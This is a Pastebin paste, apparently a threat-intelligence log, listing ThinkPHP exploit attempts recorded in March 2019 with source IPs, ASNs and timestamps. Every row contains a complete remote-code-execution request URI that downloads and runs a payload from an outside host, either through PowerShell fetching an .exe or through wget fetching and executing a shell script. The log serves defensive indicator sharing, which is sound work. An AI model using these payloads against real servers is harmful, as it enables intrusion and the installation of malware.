API tools faq
paste
Advertisement
internetweather

ThinkPHP exploit attempts detected last 7 days

internetweather
Mar 14th, 2019
896
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.03 KB | None | 0 0
raw download clone embed print report
  1. Source IP Country ASN ASN Name Method URI Date Last Seen
  2. 60.172.30.185 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/jlrutdlcstfkmzu17123.exe');start C:/Windows/temp/jlrutdlcstfkmzu17123.exe 2019-03-14T06:28:42Z
  3. 182.254.241.79 China AS45090 CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited, CN GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget http://82.212.70.218/a_thk.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; 2019-03-14T05:49:34Z
  4. 120.27.133.197 China AS37963 CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget http://82.212.70.218/a_thk.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; 2019-03-14T04:43:34Z
  5. 101.230.212.114 China AS4812 CHINANET-SH-AP China Telecom (Group), CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lznqcoanzlxihhf1788.exe');start C:/Windows/temp/lznqcoanzlxihhf1788.exe 2019-03-14T03:26:53Z
  6. 123.56.49.19 China AS37963 CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget http://82.212.70.218/a_thk.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; 2019-03-14T02:13:38Z
  7. 60.9.131.20 China AS4837 CHINA169-BACKBONE CHINA UNICOM China169 Backbone, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/gmfdsduurcahbsh17282.exe');start C:/Windows/temp/gmfdsduurcahbsh17282.exe 2019-03-13T19:18:42Z
  8. 103.27.5.194 China AS58854 AIYA Xiamen Aiya network Technology Co. Ltd., CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/mppnlkwacozkwvg23106.exe');start C:/Windows/temp/mppnlkwacozkwvg23106.exe 2019-03-13T17:45:46Z
  9. 58.58.27.124 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/raatxiklntxqphv6333.exe');start C:/Windows/temp/raatxiklntxqphv6333.exe 2019-03-13T15:23:52Z
  10. 180.169.94.253 China AS4812 CHINANET-SH-AP China Telecom (Group), CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/jrrojigvihebyol17813.exe');start C:/Windows/temp/jrrojigvihebyol17813.exe 2019-03-13T14:06:46Z
  11. 110.189.168.59 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/xsutfrdnmlonkjt15003.exe');start C:/Windows/temp/xsutfrdnmlonkjt15003.exe 2019-03-13T09:18:24Z
  12. 47.92.109.211 China AS37963 CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rrzhwyrfxcbmkvt29580.exe');start C:/Windows/temp/rrzhwyrfxcbmkvt29580.exe 2019-03-13T04:53:16Z
  13. 61.166.240.34 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/vsrkyociqmlapkr11461.exe');start C:/Windows/temp/vsrkyociqmlapkr11461.exe 2019-03-13T04:19:51Z
  14. 113.200.162.225 China AS4837 CHINA169-BACKBONE CHINA UNICOM China169 Backbone, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/iiqpccjjmjjpoux8275.exe');start C:/Windows/temp/iiqpccjjmjjpoux8275.exe 2019-03-13T01:10:10Z
  15. 119.97.239.146 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/npkokqlyyrlyfmz30714.exe');start C:/Windows/temp/npkokqlyyrlyfmz30714.exe 2019-03-11T20:59:39Z
  16. 223.71.224.114 China AS56048 CMNET-BEIJING-AP China Mobile Communicaitons Corporation, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/stuxlmcffcskxkn735.exe');start C:/Windows/temp/stuxlmcffcskxkn735.exe 2019-03-11T19:31:12Z
  17. 120.27.133.197 China AS37963 CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget http://86.105.49.215/a.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; 2019-03-11T18:51:42Z
  18. 14.120.227.4 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/tppbstrpcbalxvh31008.exe');start C:/Windows/temp/tppbstrpcbalxvh31008.exe 2019-03-11T14:35:54Z
  19. 222.178.154.44 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/wbqgksmvhubjyvp19072.exe');start C:/Windows/temp/wbqgksmvhubjyvp19072.exe 2019-03-11T08:48:27Z
  20. 114.115.170.152 China AS23724 CHINANET-IDC-BJ-AP IDC, China Telecommunications Corporation, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/gqxkmimhtxtvrnj13781.exe');start C:/Windows/temp/gqxkmimhtxtvrnj13781.exe 2019-03-11T06:25:08Z
  21. 61.178.243.203 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/kuqsghgrmkcsxnm21951.exe');start C:/Windows/temp/kuqsghgrmkcsxnm21951.exe 2019-03-11T03:03:08Z
  22. 211.149.134.235 China AS38283 CHINANET-SCIDC-AS-AP CHINANET SiChuan Telecom Internet Data Center, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rxezoavvrkhbyoy8592.exe');start C:/Windows/temp/rxezoavvrkhbyoy8592.exe 2019-03-11T02:00:23Z
  23. 220.178.40.98 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/qfutrylkndixdti26488.exe');start C:/Windows/temp/qfutrylkndixdti26488.exe 2019-03-10T20:55:38Z
  24. 218.201.151.63 China AS24444 CMNET-V4SHANDONG-AS-AP Shandong Mobile Communication Company Limited, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/vycbhgxpztfdiif10360.exe');start C:/Windows/temp/vycbhgxpztfdiif10360.exe 2019-03-10T11:58:02Z
  25. 118.122.168.207 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hdxgzsldxrjtxch17953.exe');start C:/Windows/temp/hdxgzsldxrjtxch17953.exe 2019-03-10T06:09:50Z
  26. 112.73.81.188 China AS23650 CHINANET-JS-AS-AP AS Number for CHINANET jiangsu province backbone, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lgaxyggezatjfsb11135.exe');start C:/Windows/temp/lgaxyggezatjfsb11135.exe 2019-03-10T02:00:14Z
  27. 60.165.248.102 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lcnetkdntjwmjay7449.exe');start C:/Windows/temp/lcnetkdntjwmjay7449.exe 2019-03-09T23:53:34Z
  28. 218.94.13.62 China AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/aeanqfnpfvxzrkv26348.exe');start C:/Windows/temp/aeanqfnpfvxzrkv26348.exe 2019-03-09T22:30:04Z
  29. 92.38.241.184 Russia AS12695 DINET-AS, RU GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fffffff.ff/download.exe','C:/5.exe');start C:/5.exe 2019-03-09T18:12:09Z
  30. 183.95.85.118 China AS4837 CHINA169-BACKBONE CHINA UNICOM China169 Backbone, CN GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fffffff.ff/download.exe','C:/8.exe');start C:/8.exe 2019-03-09T17:32:51Z
  31. 197.6.230.87 Tunisia AS5438 ATI-, TN GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/15.exe');start C:/15.exe 2019-03-09T16:31:40Z
  32. 196.224.1.237 Tunisia AS37492 ORANGE-, TN GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/13.exe');start C:/13.exe 2019-03-07T22:40:32Z
  33. 121.42.37.17 China AS37963 CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget http://86.105.49.215/a.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; 2019-03-07T18:57:28Z
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!